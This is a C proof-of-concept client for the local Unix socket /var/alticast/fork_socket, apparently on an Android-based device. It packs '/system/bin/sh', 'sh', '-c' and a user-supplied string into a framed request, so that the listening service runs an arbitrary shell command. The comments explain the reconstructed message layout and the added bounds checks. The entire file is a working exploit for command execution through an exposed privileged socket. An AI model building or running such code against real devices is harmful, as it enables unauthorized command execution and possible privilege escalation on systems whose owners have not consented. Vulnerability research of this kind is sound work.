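#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>

/*
 * PoC client for the local stream socket /var/alticast/fork_socket.
 *
 * Builds a small framed request and sends it over a Unix-domain socket.
 * The layout, reconstructed from the original byte-by-byte construction, is:
 *
 *   byte 0     : 4   (fixed; its meaning is not visible in this file --
 *                     presumably a message/command id, confirm against the peer)
 *   bytes 1..3 : 0
 *   byte 4     : 1   (fixed; meaning not visible here either)
 *   bytes 5..  : records of [len][chars][NUL], with len = strlen + 1,
 *                i.e. the length byte counts the terminating NUL
 *
 * The four records are "/system/bin/sh", "sh", "-c" and argv[1], which reads
 * like an argv for a shell; what the peer actually does with the request is
 * not visible from here.  After sending, four bytes are read back and printed
 * as an int.
 *
 * Usage: prog '<command string>'
 * Exit status: 0 on success, -1 on usage/socket/connect error (as in the
 * original), 1 when the request does not fit the buffer or on a short
 * send/recv (new checks).
 */

enum {
    REQ_BUF_SIZE = 1024, /* request buffer size, unchanged from the original */
    REQ_HDR_SIZE = 5,    /* bytes 0..4 precede the first length-prefixed record */
    REQ_MAX_STR  = 254   /* length byte is strlen+1 and must fit in one byte */
};

static const char FORK_SOCKET_PATH[] = "/var/alticast/fork_socket";

/*
 * Append one length-prefixed, NUL-terminated record to buf at *off.
 *
 * Layout written: buf[*off] = strlen(s) + 1, then s including its NUL.
 * Returns 0 and advances *off past the record on success; -1 if s is too
 * long for the one-byte length field or the record would not fit in cap.
 */
static int push_record(unsigned char *buf, size_t cap, size_t *off, const char *s)
{
    size_t n = strlen(s);

    if (n > REQ_MAX_STR) {
        return -1;
    }
    /* 1 length byte + n characters + 1 NUL */
    if (cap - *off < n + 2) {
        return -1;
    }
    buf[*off] = (unsigned char)(n + 1);
    memcpy(buf + *off + 1, s, n + 1);
    *off += n + 2;
    return 0;
}

int main(int argc, char **argv)
{
    unsigned char buff[REQ_BUF_SIZE];
    struct sockaddr_un addr;
    size_t len;
    ssize_t io;
    int sock;
    int reply = 0;

    if (argc != 2) {
        printf("use arguemnt\n");
        return -1;
    }
    printf("got %s\n", argv[1]);

    /* The original called socket(1,1,0); on Linux/Android AF_UNIX == 1 and
     * SOCK_STREAM == 1, so the named constants are the same request. */
    sock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (sock == -1) {
        printf("socket error \n");
        return -1;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    /* The constant path fits in sun_path; keep the copy bounded regardless. */
    snprintf(addr.sun_path, sizeof(addr.sun_path), "%s", FORK_SOCKET_PATH);

    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        printf("connect error \n");
        close(sock);
        return -1;
    }

    memset(buff, 0, sizeof(buff));
    buff[0] = 4;
    buff[4] = 1;
    len = REQ_HDR_SIZE;

    /* The original used unbounded strcpy() here: an argv[1] longer than about
     * 990 bytes overflowed this stack buffer, and any record longer than 254
     * bytes had its length byte silently truncated.  Both are rejected now. */
    if (push_record(buff, sizeof(buff), &len, "/system/bin/sh") < 0 ||
        push_record(buff, sizeof(buff), &len, "sh") < 0 ||
        push_record(buff, sizeof(buff), &len, "-c") < 0 ||
        push_record(buff, sizeof(buff), &len, argv[1]) < 0) {
        printf("argument too long\n");
        close(sock);
        return 1;
    }

    /* Hex dump of the first 0x30 bytes.  unsigned char avoids the
     * sign-extended "FFFFFFxx" output the original produced for bytes >= 0x80. */
    for (size_t i = 0; i < 0x30; i++) {
        printf("%02X ", buff[i]);
    }
    printf(" len :%zx\n", len);

    io = send(sock, buff, len, 0);
    if (io < 0 || (size_t)io != len) {
        printf("send error \n");
        close(sock);
        return 1;
    }

    /* The original read the reply into the int that held connect()'s return
     * value and never checked recv(); a short read left stale data in it. */
    io = recv(sock, &reply, sizeof(reply), 0);
    if (io != (ssize_t)sizeof(reply)) {
        printf("recv error \n");
        close(sock);
        return 1;
    }
    printf("done ret = %d\n", reply);

    close(sock);
    return 0;
}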